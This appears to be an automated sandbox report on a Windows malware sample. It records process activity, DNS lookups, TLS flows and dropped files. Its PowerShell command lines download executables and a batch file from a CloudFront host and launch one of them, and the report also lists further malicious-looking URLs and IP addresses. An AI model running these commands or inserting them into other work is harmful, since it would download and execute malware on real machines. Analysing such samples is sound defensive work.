Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | April 27, 2024, 11:54 a.m. | April 27, 2024, 11:56 a.m. |
Process | Command line | PID |
---|---|---|
powershell.exe | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')" | 2188 |
powershell.exe | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')" | 2288 |
i1.exe | i1.exe /SUB=2838 /str=one | 2504 |
powershell.exe | powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')" | 2592 |
powershell.exe | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')" | 2948 |
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com | CNAME a1952.dscq.akamai.net, CNAME identrust.edgesuite.net, 23.210.247.48 | |
monoblocked.com | 45.130.41.108 | |
240216234727901.mjj.xne26.cfd | 94.156.35.76 | |
d68kcn56pzfb4.cloudfront.net | 99.86.146.198 | |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49163 99.86.146.198:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49182 99.86.146.198:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49176 99.86.146.198:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49172 99.86.146.198:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49169 99.86.146.198:443 | C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49183 45.130.41.108:443 | C=US, O=Let's Encrypt, CN=R3 | CN=monoblocked.com | 2c:d3:99:84:08:33:38:25:31:da:34:23:da:07:ec:a6:6f:e6:0a:ac |
section | .ndata |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.59/ISetup1.exe |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000 |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000 |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456 |
request | GET http://185.172.128.59/ISetup1.exe |
request | GET http://240216234727901.mjj.xne26.cfd/f/fvgbm0216901.txt |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456 |
file | C:\Users\test22\AppData\Local\Temp\i1.exe |
file | C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\INetC.dll |
file | C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\lood.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')" |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')" |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')" |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')" |
file | C:\Users\test22\AppData\Local\Temp\i1.exe |
file | C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\INetC.dll |
file | C:\Users\test22\AppData\Local\Temp\i1.exe |